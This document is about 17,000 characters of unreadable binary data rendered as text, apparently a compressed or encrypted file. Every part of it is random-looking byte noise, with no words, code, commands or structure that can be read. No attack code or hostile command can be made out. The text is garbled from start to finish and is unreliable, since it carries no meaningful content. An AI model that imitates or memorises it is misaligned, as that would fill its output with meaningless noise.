�èY3M���K�s_[�(�zH�TY��������ز���V�������~� ��Ŵ &[1T5���F��Mķ� �q��Y��|%#ƃ�(®������ꡀ��a��]*�`LĒ����WU/��,KL`�����B��s'��paւl���BЁ�������L�>�n�F�`u��Ja7�r�a���]�Ԫ(a�@]}xW2s�ГX�`�S�i=	�QƎ�P��:���+����÷�8�u~ ��E�տ�I�~��}�d��߯�0}��"sT\��p��b	�O���Ǧ\R���^rw	.C&��j�p�D��n�U�c�^QD�A-Bk�f��(y�Zg�:wp���Q˺�����J�Q��W�`3	��ႇ�:{R��dDcI�B_��Q�I�&�u1A��FS_�΂�[{ �C���2 Y��o�}|��\h�hgh4}�a�ѳk	�+��F[��L�Ǭ�ڊy3�F�q��
ͅ�c�wk/l�"��f�S�'���ZHC}���m�s�]���.��"��޻���) =�J�>�@��Jd�	�i��x��A�O�����x�p�=��*3a�nu,z9ĀG�;L�!�����u07��!�w	V�?Xxp�**�
p���������o�җ�t�����x#I��F1}TᬟϏS.�7.��,�(�?Ԡ���:�� s|&����-������u|�"ʵ�ϛ�XxՐ�JҮG����[��,k�Y�\�^�c��i�w����۩F��X�V�F� L"���.�bҕ3C��'XK�vO&SR0����[c3sN�YAl:���O3�������w��}�ˑ6��I����e���X�>RZ�	��-��ǝs��{Wu�^��H�Ϟ�̿ܶ����+I~���^xk�`v����ŋĠ ��p�&Y�����W�n��Dq�m��`H�e��C��M�>���,N<�E�4�ߓl���B�F�[��L�U/� nr��'& ���91l���z�5��^�{�#��i�1Gv��~�$�m�b ��n-G��,�>�B��K;��|�Ei��Ղ��hv�J��^慰�;���H�:""��܌)oΜ*�#�����:<�S�V��o��"��}����=��O��������:M�X]��;�չ�É�����L�*&����z��	�<w:�G���o�8���e���0>*+��
���
3��d��~�l�}��՞E0�L�>ֽ��&�3&�`��W��ſO��~���eUە�?`{hx;U��<;���g�^��}�����s��0�n�����ۆ��_�,N�b�X�d���~�i
 ����]_�pW�&�@�����ȬO���Q\���;˵h6���`�p�)2����	q7%0���D�Ѹ��]�ZXV6���a�e��<��7���[Y�a3�׻���WZQ�.Ŧ\����mB���r����KKW
���!#yh@V,?�m�5�k�-�1hr;e?OU�F@���<�~URe2�AwLd��-A}�`���N]���%S��y��a��ң�^�,8w5Tf��9�(���s9��ٓyz�yPȌ��+���ey�e��b>�	����t��w�f��?��آ1�N0o�-�u9���@����^ˍ���,Э�w�
�iu���1��$%��8�Ĥ讄nW�7��Ȉi� ���E�ޥi���S�c�3�g�q9���&���׋�%D��f�L�38f�<��oSe���N��BV�ת7g���͹Q3��H9�������r����Ga�M��wg�N��m�O����"�� ���,%�Q$�J�A�����B\�U�ן<�N�,�B�"�!g�L�u�E a���1� �XeÔ'�@:l��x���{f��< �n�-UrQ�dM�3��e���"=��,C�;�Hy7А�a�QDq��Ԋ���,B�RL_��eiI��� �z����&v��h��1�@H����t9
MՉ�?��7y��L�4�{]�9�$bxyNI"��=��K��gQH�p&Y������>]G%�6�Y���KF���/1�E�$��]!���j������ q/�!$l�� �xi��ږʃGX����!��?)�La��S/��Ha���o�h�Wa;�_G�C�f�J���d2:wx����|�?I�e����Tw'	�|w��m��A�&��,��A�[=+:� �	%��Td����J́W�ж!�Q�
K����ɮr�g�*J�t(�4I����dg�[)N��8����UG���g�?�w��I�Җ�&��A,�$�(��	�_���*]������l���è�z�<؁�W��M��NÝQ�. v|w�{��	tb�F�~��	�]wK�X�s��k3��Z����/���S�m�_���"J�����?���k�o�	)ƀd%_/\���Ł�e�u��ڎ0�ڏ�J�y�����|�����$@j�.�g����WC���(��xW�j���|�q�����!֜�\�L�������r���(��RQYĦs����w=@w���A]^V�ߣ�\{n"�Α�Z���Ϣ�`ua������ؑ:���</�N�/S`�;7�
���� �tV��87L�.��(|񑛗7�~hz�I����{_�dW1Ld�/[,6("8�fɬ�2wX}���+�k��	�����r�6�(7{fͣ�ʒ�Z65�i����!4_�GZzd�%3sI���i&u�g�~g+��l�����=
'��z���:��1֙l����D�@�f�JFǶN��6�)���Ew��O
�'����yl;�:[���C���T=W�\�ʆ*�N;�&�W���n4����>Q?�`�-3���'�;���_y�oH]�d�1��"��䞭��ia
��hE�<�wm��y�mzb�� |,)4��Q0�d:�nF�!d�
�y�Z�2�	�ʧ��x���NjV���zu�����9}���\Mx��g�ytǰM��>w�XY��V'�H@�����,T��~�c�-���b0I�� �K������J����#K0�~q��M��y�W&�O�����5��(����6෗���5���	�|d���"�]I~x�)2w`&E5F�>�<��~ȋ�Es��m"�B���w|f���Rv܇p��c��&�Trb�8�7m�l�z�o���fd�'fNߨ�y��G�^��`��Y�3qz�{��K�}�}�B&������Zm9�Hm��ao�n�n��QD��D�=�Jx� ���5���w7����H���؟�#HZ��S��m`7��Ă��=��\0��Q��WW}��P&�|`#�YVO)�4?�� �U���k�e�EX���!���s,;n~���M{��cpy��[XE������������������[��h`j�z�|������!�p�d�6�-������,�Ñe*�w�0KBVjĈ-��/U�r�����F�Ƌ�H�9mHu:D�r ��Zʔ?Ы-�c˟�ˏ1��Xbf\��py�6p��?S���@Hoe��d�4iK��%p[�'/a�|c9�<#�㈪Z����D�]�g<�{���87��n�m�o8y���M?(O��!�ff�h�:�~������V��־���� �s�"|��]��t89���^L �I
����V�˩�hI������
��1�p�[���Ӆ��#(�?؞�L�3�nz�;"�-@��#�$.ɲ�M�<�Iv>�뷶��r����mJ�C1��G062��P��)&+�"̐;�.$4�^N*b�{^�!!ݒ�L�R$g"x(,�� e'VH�'X�\g�]R����8��S9�E*}�>blcT�(2�/ˆ�m��en x���3\���D�=	��A\k�^��rR�I�R���2�� :��l{a���Cr[�T�΋7�_��d|,�r��
p����~�Վ����Y����W����Ȁ���z�8*����`M<��T��� ܷ�����}.ّ'�ܴ�d�Y][ps�-'4G�|�o(����[�l��=��ۡ�{�9�4*��-�m�iΧùvi���{��^)���$]p����ʙr��(n�l����� ~�t���cqԑ��&<���{4�]�8犱�$5��+��G�S�U��	a_]Dj�	�5����?��?���yU���\N��\�Ҳ�)�Ѭd�'�@v���͐^�{1�A�چ-�ހ>�(�ZH�_�|��߭^�7K��.�uiS��B@Ō]�S�X�Ф�p��۳PT�)�2�d���g[�9"����გ}�P_4���ϔ�ƚ���O���L~��:'&�d�,�/�'3�;�!Q!��h����Sl�g�[��D�_�Ǡݫa�KV�^��*O�Ő��"���1�f�G�E7O�%���q���̻m�Do7�x�z�����^o�cGRÈ�z w�(���2��OΛ5����%],�f��V�Trv� -0�)�Ww:&-)�'e�`�Շo���%2�=��;_�]D�/U3cX�;�s*�)b��׈`���Х������N쬫P�`M����St�4���X��&����@�oT�X�����K��x������Z�����8���N?�a�I3A4ٰ�E�����-<MP��Q��t7>����Ѹ��'�m�݁�#:��r�Jb�3�����SԻ�պ\�:X"���o��Z_w��R-{���|E�rG16�V��2�m��1��(��8�R%Eo��j�m]#�J2�V_����b���%!��?�l�;�w�V�D���v��ӛy�)=�sE��`HV��G9��ߔq.����ŞEwܔ�T���;�� hN7}'�g���-I��F�
���''a�+7<p�vaڽ��:���g����~g��Q�8Ǿ!��K(�S��<蠋��l��p��'#.�$��z��=b�]�,��[u�,`p2TϽU,Cq�nea|��mٳ|{ry�k��<�1	~*P(�������G���l�M�R^Vn����Gc��3m�WdW��H�Z�+��ױ� mY2��k�ঝ��y`����z�)G$��y�n�v�'�05������⚁�O�,���6�Ι�O��#R��)�����b�kހ�q��2˾`�̙rƠ,s��X�-:��/f����H��߬+T����:� ��+�6!8��[���r�����Б��j4��q�*��d[�j�Iw�=� ���i��l�]x���Đ^���#.EK��gy����n�	[/̓�`<=����U��lu�H��6�Ѿ������&�n� ޔ�w����톯/Y��+���e�ݙ���ٟ+��+�)�Q��zk��=YIvD��&S��q~�y�(n��wX���C�wq|!����U;��mϴ���Vf�.d�c�`���a����/h����e������Hk�j�ND�,��GC�������[����׭Ry�c��S�#�9��w��?�|�(��FZ��XJQ�֟�ߞv�$K3�ܒ� ��иTS�S}�є��$��6o�@��cA�O�Y�T0r�rb����췑}{���by[��X^5RU���(W�3�ރlo��(Io���_xL��2Qx�N�h�k쌅�Ff8o �ѝw�I��(�K�_8��s�b��O����Uŧ_R�+X�
���E��H�]��V+zC�� �t0*���zl��ɍ���
?M��2���~�s�J�J�>ީ�7�k�L��B��(���$w|�uS;0��t�䦟����P��mh-�8��E�q�X9��W�5����:s�x ��oWa>+
�G���1���Í���2wԻ ����7S�U�$p
+�o��:� :ɂhCx&����)�y��U#`ƛg>� w�����AE�"�ɸ��p�C�=3F��}Fk�v��ǣ���7_��5� ��B#c�%p�!��d��8���hŐ?�`#e1
��޾�A�ŦyO+�$xP,O�/��yp�C��$���b�a
t��3��Jkb���?��z�ٍ�,���sɣ�w"lbٷ�+$|���fpjO���h����|�	�m!� w޼��H�5��鷇`������-;gҔ��%7��=�ϙ�)��7X>�����N�豬W����X�ˁ�뎑�W?���o����Jw� 5��w�Ȇ��DZ��+���E7O�������4��F���m<p7�u]gϝ���8	WJ���-���J�2`U��PsZڄ�(��+ΦE7�0�,��������;�6} s�:\u<p� B�j�p/pi���,��?z>��a�1=�l3~�S���@	��6;�Y�H�?�ԏF[�<6�^:|G��GʝEWn����k·�&��-Hp>F��OL~1K�V�u��"m�N�0R�������2*g�{�S͗�M�K�C���+m�T��[�`�ot�3����L���KY�r�l��<�@�=�U�����w[*a�ʽ9_�����1�`Fç��!+a��tr!ul���,�۟� �6�:꒿�Q�9�c�y&=�8��L"1w=���̤�O)��/V��AHXPR����M���	+UU�. �3�'O F	ʎm�gz���{HI��ù��O��T�9���7��
 ���Y�s�X̓D���Ě��*Q�:�sX�w��F�b6S�o�^�C
�;l�8Rf���nr��X�wl^^X�������r-�*����Gb �hxn�9�4��j��K�Z��FY�Y��:s��� �M�>�w�l�~�a{��:�6V������f�[Y[ٙ)F��N4ō�>o�����TR�:�p�a&�M�f�G��s�_�y�u&�֠����%F�ݥ��Tf�P�]�P�����G.���g>��MXiy_{JA0����J�.f�����
����p�+sǢ�Yz���]�z+�Oɤm©bH�gO7Ƙr��ܮp*�_�w����|9��k�Y_�7#ou�m�w�],�͡�h�a��/�{Q�>p�� �kr�~��I��u(�n�ѓ)�����<w��'�O� ׇ�S�*�4~����)�i��Z��� !��&I2[]�Mq��}7����y^�i3>�_!�4�b!��U�h�	�>ҁ�W`�c��\���]ܸi���X3_����ǽ���l��fX��j�~ͲeX��P��d��y�Ɵ���(M�-V�.�8�l�W��X�'e���`�ǎ|��D��(���||���K��}�|�׉x��c�g��蛽��o�3�c���~�ڷ�M�@z�������.8�u�v}����q+T{�m�G���aH� @��������0��g���1,�s�:�',s��B@(�6Ao�r�� ��y0Z;�Ad�^X�+�.���I�ey�����D���J?�����{㠛�軀��Am�63�.�	�)�����i����@~�ǔ�sbEF����i��N�JO��e�J�.2+9��IsI	�c�ه �]G�og����
B2�Z۞o�pJ����%��䴄Iވ=8�n��~��*ސ���j� ��:$0.����^�|��_�������kH�ؖ����`]�`0h���W_+�/�>}P��|a.#��!�5���}.�]U�r�e�+�3���̆�k��T��j-���}\�����J\z�� �k�Jwy�%��f?Z�K;�	e)$��H�V����a���X���V�� ¥n�.`�|a�3�Δ�����~4),X:r4OY���rT�|���B��]��?O�,oa^�6��e�P�RNH���t�dm�V^�契�2]_�2~/�n�=�sx��}[?-�����Q���-^���,�����,����J_�⭖��q0c4�L�<�h����|羷�A��`u�y�p�c
�6i��V�qB���~_8�,Jn"_q�E�|l�0Ig����>�.K^����x�1)�7�-v�����Cvk<:��2+�S�b�jyӰ(3���u�Y�����#�b�O 1y�|������rZ4-�m�����Y�_-ٷ��<�l�fN2$���	d8�BG�y��(��ġ�p�ɀB��TLY��i��x�jj������a\2��!�y)�~5Ad���KӒ_��ݸw�  n��l=+(��+�m���=����(�@2����*M,�$t�2��k���?�yc�b�x/m�sB����3	+��fs��M;	�&K{�.,Ȩ����q'{xT~z`��"}+fm����-�'y�@7�'z��"����ՙ/uXG(�fOl_ߊ�0#��7mQ$4_)SV�/	�	p%�-�ɰ^>+���5�I�M�Ȣ��i��/s �k.=r+���`s(K��q��OI����	���|/8��IA����y��Y�J�c���~�%�;���{�ܚ����&�Z+�ҳdB�m-X.�[�\�\)��Ζ�^~�i�0n~�`%��m��,�]����B�Kzn��}���$+d5-)5�w��C��9���8�D�M�t�,G��dˈ��Ȑ�)�K�?���*<��3�+&VE��{���ml"1��R���V{��� eB��sW.���D�y`c����LO�����1�)}�t�pmsA��̅lz7�ut��ZK6Hn8�@��}��tW����y����2*qZ�R-ן��)ȼyc��O�Bix����3�et9k(_��,qM�?���Z1�HP�V�G"�
�h���� J�~W�G�;�� ��2P�p��>��������v@J��.E���Ƣy���nr��.s��T�b��
��Mj_b��E�:��S@�٣���:��\�#QnԺ_뉥�+QJ�d�S~�މB��V�c���,�H(�E��a�rI���/��N�<��z��Y�O-�yܵ��?(�]�Vs����bJ�ܛ9gl׏�y�\T�f�Hm�MХ��v�q���{��i����[�8��k���bm�����Ն>�.����6=�.H�������/�R@�.�jO"pH����Ϙ�KBs]Ӌ�̿�c�닁��	���2:���|�;�р.�A��w{?���Ȱ�$�6��C%
w��ħ�6W����3K�~bflc����S���.�Qċq�5������c�o����)\ȝ��=�It7��V?u�L�y0��4Ӿe��q��J�,�
d�G�ʼ)�}���_"	ݗ�Zw�]���V�7��H6d*���5`u�J�m��:h�b�w*�~ 웽w�����z�ц*(����gs�ɗ��j�;��G��^��qd��N��AË���s ]�ux�L���,�`{�m���D��}بg�L�l��a~�@N�����Û�g������r�Lt�:N�^l��(���ȓh�d��o��MA�[UdZ�&�B=5r�1A�7*W��a;���U8����]�jq宕��44�20�tz(�Hd)(+c���,�v���1��K���K�-\`��"��eǶM��i�J]r�zVeQ6����ۯ�^�Po��������lMR�ʅe4�|�o�bj�� 0�!][��RE0��ڠ�b��'L�H���{��Հ1�xN������#,���R0�>�����IN�e�M\�L�.�k,�N���ql��G�d��Q�ZJ5�o<��,i%��H�,ŒkyGDƟ��m�����kWU�+aA�O�[.������3j��<������[��Il��d18�ſ�$s�SqG�v��>�
�)��[bKk�4���!���`��;�6���aCPS5��A��p��Nٵ������%p�ʗ�K�0]8��$�_6l��z�~�7��g���{P|tA>hܠ��_���%yV����8Py|����!�C.ފ��8�����W	^S#�wܶ�("��=1�!X��B���h'��Z=����1/.8����V��ʞ9r�}�ѷ�m�>1Z�B6N�}9vMxcΗ�UC;I��b(��ڒ/z��R�>�l�p[�xW����{>�2E�%����A�8U��}N:�P�c�:�"N�h�8I��Z[K�&�}�@��]�c�?�F(��x�M鈣�x@p,��ݞVrZ%�b*&K�8��t<D�<̓��6��1v������Q59[N0��$V*�{'OͨL�f�T��\��,�$�+Wz^��?�(ZS��k�}�ǉ�h�i�|���ݠ����,h[z�.�?�{�}'2����a* �`h���!�ɂ[����]�>L�fs׈�<f2~ޡc�Z��!\�Q�h��wh�a�D�|ϫ,��}7 �����fG=
V��qG�������V9�XS�7��^���s:�9'^�ّ�p=L�;��H��ǓCl�j����c�� P�+t�s�c�8Q�숲�[��]d�p2�N�*����z4Z��G��ыO|�ֶ:(������19p����&8S�!@k2O}H?縂v�a�i��d��5��-�WJ�[��0�,{r���4�A-����N�L���e�x�~Ӣ�ѽ�1�p��;í�x5��ɜH���G5��yL����Ɋ!�c�Lm�L<?�F��Y��cn��l��^�'n�H
1u�v���Y�h$�{7���!�+��Q�z���~3��0A�E9!�t�`���l
�G�9ok��w3>X��[fF$!�y���2���>8y�����9��s�^b�\�s����7�X�lF���u�����	$�pB.�d���#����5qQ���;�����&7�{����\��>@��y�#�G��}�7.@���6x*҂j;�O������%�6�QdIn�	�6zR_?m��-�ӇM~̖�Q�����ꩌr�����%���ׁ���%��:�4b���^�W�y?��'h��]t����B��������j�1Q�:��}_������\��Dr�0�ڊ�㨦T9 �|k��ȇī��Hya�/�-��;��8��*9g��m"�0QAA���{$52���ټ-�-��%t6���~�"ҏ�晪�^�>�8�V�oz����Պ����,YM�掘����@���z�яR��J�$�.Ig4I��|M�Y O��_��e��öD�dZ+�|��^
g�]�Q
9lH��{J�%DI��~q7��E��XQ`W�p�	w�_���Y|�)��������f+�)p`��ew�@�-s��o�m6�C�3��3�R�T�iaI�x����y-��~:��NS.w��b�yt��>�J��/8�ᱍW�y7��۫�]����)�����v���Ɛ�s>����^X�c�Ytw��׾e��*ʝ�U�I�p��|Ĺ;z�|\�:�����l,'�s�>�N��i���.~whLV�Y�^8����0�Y��>9�}c3�0H^6�1����p(t�	������S+�j�-�QԵ�^| *�Y����Rd�~���^�K�$�+�(����ǯ��'ƂMN���#��)E��W�����S�{V�C���τk�5���ɉ��)'�)5���嗥����ӱ^[�<��f�VG'�h�����C�W�+�� �/�y:���ih)u��	rHNSI��� W[�?(�jn�v�4�������Opi����r	�/-����\��'<��`!F�zb`��eP���3
���J����<�"R ��I�[|l�V���@;�C��)��:��QK����o��:���ݩ��w���>K�u�y"{}Hf�K�&�5�C���}�[d�.jT���E'Ü)G)v���8��v��%Y}��:�y�9ekY��N���2���I
�C2�O��d� Du%z|�U)�r�e���nȜ�'>ɺr.B<�J�7���.[��[�_�cQۓ��,r,bDJo>XU8V���_�����+�;	�I��zr�K��斓A��<>�C��1�>3i�Ϗ��*�N�5������2�zA枿/��È�������:��b�ZWJ���L"S���ˊ�[[��+C?�m. W�~��}�BtA�V���e\@�?"w���E�QL�v_���7����&}o�Ͼ�����5W��x�k���l�=p&�&�����Q],M軵h۹��/bL8��ێj��)Ժt!&!�\� ]�э;�ܗ[�k�b��ͧ�>�Ҟ	3�qG��O?��
�)��5kx�-�<�|�͵կ�J��f�:�6��~����R����z�s���_q��&�n��o_��ëЦ���!�]�y;s�g? �1�V���ֿ��W��=��Z�,��>9�]O��'Ӫ�7G8����H�6�;�O
�@�\y�1\�j��xzr}��A����fA�8����*�����V�g�-�=�J��P`���;����?NV���|�K�����:}`wJN�Hp���W�/��и���C��I�LoC9h���!c���P8q���C���qA�xx�BW���IK���?g����vԸ .����@I1G��WT
bZ����6�4�^"N�w�i ��O������.�@Q߰|7�g��h�_��] Yd��m���O�C$�0�վ��Lj�]��0N]���L,J�de��hl?�n�Sǀ���1�>˒]'��=���rE�"����p6�p��8���v��Z!�n��j���!������/��a����vRj���Wu1Ї�J�{�V2P��M.Sx���d�;��\��S�gF��%��b۝��$y%C�i��)=!m�7��y�3��pF~���Joݹ�=y�bU`�x ���r�]�cn�(�Cm�"�6�W>��������l`}�G�}4>����
wB�����宕-��巃Ǖ.%��`�@�S�\�����|�<�	��`��kծ-)�ε�Ů�A=�~n���� ��bҽ��Zc�@��	Pf��/���:Z�&c�
@Rl��e�=�d{�eQ9EN�A�����_�g���`�����R���\���![�dN�ꗃ�	�8I�!�ld���z���$�����hGG���]=lG���Hߟ�K@EK"���y�,���4f�P2ԃ���ޜoQ�A������g圭����ݻj� 1O���<!�.#P�ޚ���M�?���D<'Snd0��Ⱦ`�9%�;-^O�a����Q#����ƛ���	�h����(�����\˙#c�ޯK��,�Qmar�u��NZܶ0��4�$�;�u��(��E�?��a}5�R����z���@���Uˎ���F|g0ƤEn={����&�b �f���Q��b���2���o5-X8UG�G��4[4�}'Kedt���W54������Y�N��+�C�	 ��7��PG��<�������j7��-G�`�ؽb9��@�/}"�f����昁a/�w�>�(�h�@#�v�ɲ��M�?J}Gʜ��m@���K�rO|�a�JCN ��Hd�9�	�������}���:K��wQ�*
��W2Uq�]e?������N(v�y
G����D��x�v��j&#����:�3>�E��z�Zv�Yi��##>��v����C�0Kx��vpz\�^1��ѓ]��;�ps�"�IN�}�$��v�d ��f�j�ef�y@&�f�G�Z�6w�O}^�>���<m�����%���4�ancj>��>�T��ةD�9���~hJ>�h�v��t [�&�ϔN8,�FF!�����!�X�4,�1c.�r#�"Zz-6��>bL�[��j�&*��=�ߩ�]u$ɇ�k�\�mF]�d ���N�%/f�ˈP$����p1�,�24��ܖ�-sp*�l�x�B䠔J��Ö!7� 	ft��H�o����Ƽ�Š�����M$��y�X�Q�M*�{i��cY����i�����i�˃������%��a�W�UU�~������s��ba���=�����f��J�鵷.Od��YN�U\v���|j�����7Y��:xJ�������zȜ�����F���C�h�Zj�y϶z�.v���ع�Mp(�~�jz���VJ�1����F/��4p�-�U6�����^A���ũ�P!�A˭����e�h2_���Eܷ�>\̴��^V�+m�jج���}w,�y��}�2Dl�kp�i��U^{u�H�G�}��C��4�������z�,��i�~a;�EƼ�c���}�/��lC-���K| �f��O�+} ���VtmB��{����ٯ���*�0�@;�ʭ�} �`��E8F�1�w/~�IE�� �W�F�h6D�����CI!L,ͣ��S���ʸ�jk]�Kz�����GF��4Rh��[ƢW�d G�����p2�V���G���Z���
�
�o��R9`Tv��|CN��sJ[3��oGY�@�o����&�P�Z�G��u�Q�������0���|:.bۊ��rD�J�l.��fe?��TQ*5�pk�����* ��Nr����M��jj�(��ip@$wþ��3����|�q��ۣ'�JН�� �CF̘LGM����Ü��u�@��02{��h�%[��-���S�/�疹hNF�?Q��	AH=��k�]��_�/;+����on�W?��.%ۗ+�v���i��X͋��wU�HV�B8GP150�)��(���!
^G ~�� J��P��XB�!�H��#9붧��'��qyN�7�:����l*���#�Und�LL���XH���Ԕ�ن��l��<���q���� ���H��!@������:�/דf�	�Zb�9�=h������ ���p���T��G>7�c����y� ��c�S^i�WIf3:��Ї﹯Fm//ˀ/�����4����#8���uHn�> ���(K�9z0΃Q�ǏP�cJ�~F��#!�-^ IV#6�p߸����=W'� ��!*JӋ'"5��¬�[�p.Uo�a�868����"��TE)�R�1���w��s�!�FčH<,g4�/l��նZb��C%�h��#�h�(~t%���嗖���8���x���n�CsJ���rS�k  \<t���#?�h��!n��j.?��!�y:J�W��@H�6���my|ߖ��nLћ�ﰳ���X��Z�/��;�h�	c�^_�u`�Z������mV��4��\�(��?�o���9x�/l�ݕ ��ܟ�+3;�i.�AU���F�§�J�G�Oݪ�
����܅��k)��X`&��[Zv �D�.V��؛��S��}8@ɨtQ������J��6=+��]��D���
�Z�,���]�צ��o���hV~0�E�eL[U�ڳw?�{[��#?�ϛR��(��y`:_��[1�.<h��^����]P.�V�{\_��k�O}��;�
ӐE�T��q�TN�	t�k[�P0����",��K�x�V�J��� ���S7.��Y�@��N}P��sn§��Z5�/˅���ڻ��@)ty��[�D�)<������쉔C^.J�}���)>�8B!c��Տ���]��4'�(����ʋ���x�+Qd�: tz�g9��4���+��_W-��O��:�/t�i�g����L	p�p�}���y&��JW�CM�&��n��n�~3X��9�c�o��c�N�p ��6�0ך�>B����9��}T�D6$ǘc̤B��"ҥ�$eF��4*5I%-������1_�f��ThQ��^�G��M�2�2��J�3j�	R�x�]J.��5��Q,g�b�SK���'g��ƽt���)a;��ӵsc����ۺL�௦���j/�����4[:�4W{��+=���WJ��e��v�.E��yv~�HߵC/��-	�p^nP³R���������|a(�17}uF3+�F9+�Q���=���3Z��j��#[`}׫�-?���EA**�=�C;�<8x$u<9��s7B��cI�Y0��|Y!������搪���ɘ8�5޽����S���Z��֒��(p�����Eh����.������l�:��oIڪF�
�؊��S�W1wuppZH$���ʮx���h��q���2�u�Nr	���A8���"�{����M"
:c+*C�䲑U��_�QM}���z��;)�Sd~/IPFf������z�/14���-�܆�J�%d���� 엩���x3a���8JF8IM$���_\ٮ2�S�Ψo���b��I�q��2q������M�"E�O}�$��4N���@zRĀ���Y�\!�8�ۂ;*&���Ll@�Nԑ*�4U5?��xxj�K�� C;�(*^U�x�%p�$��}-��=hhL�o֮&��w��fԒ��J<����Aɲ%O��S5I��u\ʳp�j��:��!�￯�|)v�hHqP�#v޵]�%	s�pڳ��u	G��;�DC?w�2}��bU�����8բ}P.-����O��Xpߪ����lQ���[�rv��EW���,
�({���&�
���*T�^yO�ː�<�rq��y$�����L����2�ߒT�����e#�!v}T�d�S�})�R���ZTV��z>��s�4�GC��?�%,-[��C�^���ɯ3_�C��`�8�����c�tu�Yy�*����A��J/���[:�~7��HߗԿ=��SYSÚ�DN�W��tɔ��[>�ce�G�|M R�N{�Pr،I���C]t�y��u�Mi�k⚌!"�뻒f�am e|���Ԝj���g���{�.M�o�g0+���ƅ�]o�Wv�5/b�?ɲ>�y�)�BQ�l���i�*�z:���Ln������._�,�H㚝}X��3����U�̰C!Y���+�W�|J	-H]|��+)�/q��ຣ��>�pnq�c]�9�ת�?�Z�����y��cC �J5�~@X}�?�w�4@n��镬)���XG����ih��v��Y7�,Ϙe��6�D�QcW�����k�����q6���>p�c2�w��MS�}=�`�涐��.�+bO�&Bo���\f,i�/g֣ߓIB0=6�?I�b&2�A�)�JaE�l)��<�3��a�"݄�����-��(6��bJ�,$�&!�U� �[	�٨ݣK<�r)�E��_M���� ��J,�QǺ��b��b�5�����B=y�K@�QtXi�
�ך.���Y_]�QyZ�ß���%�ib0ϗ�S$��8OWz�h�_Y1Z�o6�}br��"'W����}|�V��"�˯���=�����a����z�v�&I�`�Ty5{T���J��Y�a	�q��>�.��1��kM�o� �1�t�*���Q�smv��N�d��͕��]�Bᬁ�N�8aZ
�(~��ԓ�+����u��o���6�G��~�z9���gi���{Ŏ���a��(r�
w�Lۮ���e���URx
�OL�{J;:]���Af_�҈!v�J~�r
:}�'�b-��Mѓ�r%0oI|� K{���
���S)�Q����2s{b�3R�yi��RLĪ�܊��ae����3�LP�F�Uٳrw]��'��ND��m*zA(Ȕ(�l��/�dڲ~�
���^��>���1�@+�0͕�t:�NĦ��_�	\F���8��p��}˛l��,���c{��]��H��w�� n ��Dк΅�2_=%����6HN�}Y��@aC����z�f�d�z�n�g���`��o�����yԘB�Q�8M�y"uuQk�r�>�ƨ'B��YC��[t�θ&Ӯ���̯,D�O��S�F�-�ܷzԃ�̜��^��U��j�M�R��D��;f�T�E��1~��E|/����[���\جA��B�w���׎-����N=�ɝ���)+�(d8��_�#���������7� T���/	 ����rR�n<��a�~,E&i�?��ɫh����(=���z�hz|W�#9��G�Hh0hϻ��0cd�D���w�8W�rS����'�e��f�@h��MO����,���������ʗ/�����i%��ыҥ�O޺�ռ��4����Դ��u�����q�NT��[��}`��0@����Ь���aL�S��B��.�hQ�ɔC��NO`}�_�s�cvc`Ӟ�EH�D7���|�N�x����_W2z��Ņ~�&i S�B�1���'���J+�PҢ)	��o�ǲ@ь�L���N�!k��)dߣ[ zy8.��^F�W�`�$�1Ș#$��y�v�D%��X�oZ�rjm��	��l���L�����|��z���[��&�A ͐�����㿳yO%�g�gȈ�k2�A2Y�٫+�1���p�����n�_�d��������ޮ���L��lZؓ�WE�d"�\4�QNA�D�t����(|�ߎ2����43��P"x���ㅖV��z�2j>@��z7�L�1Ҙ^��!�X�8���W)֔*Gv_e��$�����2���������,���i�U�;�㗱i��Q�=�V�]���Ể�����W�J�i���١Ƣ����������u�,�
R2�ORO�����/5?�����MZ��H�-�	�R�BA��-Q���H����|����u�Ω��d �ж�����[%U�a��G�#]��H�I�����}���'�$�jz�~t売j�eJ�yI%�CU�jw�.������<JZZ�e�~YP��/y5��bP��٭�8��֏Qv�L>yI7(0����b�D] \o$�O/�`�F�g_(���v[�4���xզs�_Y��(Z���0�I��J����	w���}���w������2�u��߆�EzRijS�\x���;Q�y�9��q�qu*��}��{L��d������:�oƴo0��K"IНn�L�yFasO��t#; ��ͲC��WqB�%��US۵�jƻ�.(D��������ݸ�E���>�2����f��
����㷴ksMk��H�1 �ώ����G������	v{���9"�J��x�M9W]X���9��/���-��.gѻ�����l��<�k��뙹������=�z�t���=r���PI��G_�Y)��}t3��Z2�:T9��x��#��a�ĕ��%��P{���� !�'>=�*�G��V�`�������s@3�$^��ܱ��M���Mu�bD��w](?T>{��R�rb)�+IK�}XQ~�3�F�׬Ky4���aB���=�N��V�N�"���b�:�����o]�XF'�<��2�K#"�j9����������D�۽�PF��)�������W��t^I��Z���Wq}���ɞ�=����xva��e��9��_a��7:W�[4�N�'�k�[��R�N�IBĽn�-a�|��T��f<�Q~c�P$�m�Pܞ���W!�pH��g�E��GMK��҆YFb;���(n�O��Sz�9P��wEc1f��1Q�oČ�yZY/y]H���L��[&� �;WkC���v��(��S���QK��P�ų^9����q�%��h%��{��`�Mz��I�^$yƤ� ~�3�=v?��=�7�H˶A��Z�9(滿�Ry�`$�$�
	:���0{g �AD�n���j�5s
�����$zU래W+���1�g���8��,bT.p�8���]�����L�w �p�=u�)�p47���O��Y��� ����s��s;A�$ā䗇'wr{{� � ,Oޅ��'tGKa&7�/Zm�؏\�t�n�wm��!��=�w��@�*.�ڵ��*�S�Ѭ��RR$h�����5�V#�"����u���~Ls��x���}�+l���f+���`���<�A4��!R�>z��
p�v�Lr�����v��;�s���c=�RLڠ+�&���Ȫ��T���8̙v��z�nf����҆�z�������ػ`��PC��(y��k���H$"��t����1�%�<lp���ni[��5���p��W��]�!��n���@��V?$�sZ*/2�JCQ�׋�Q��X%>�A�K�{��X�	`khpI�����jk�A���۟Ӹ���a����H�b;��޲�\��Ҩ�9J_ࡗ�[�\�X���� K	7��ٌ�^� B���|���f�mu>?���H���
_�h��N>�_��;pp)n8V���S�곛JbOح^l·���2Z"�(��b��x�����cX�1cwK|�����;z��t��	̋ �Ng�� �7�[�
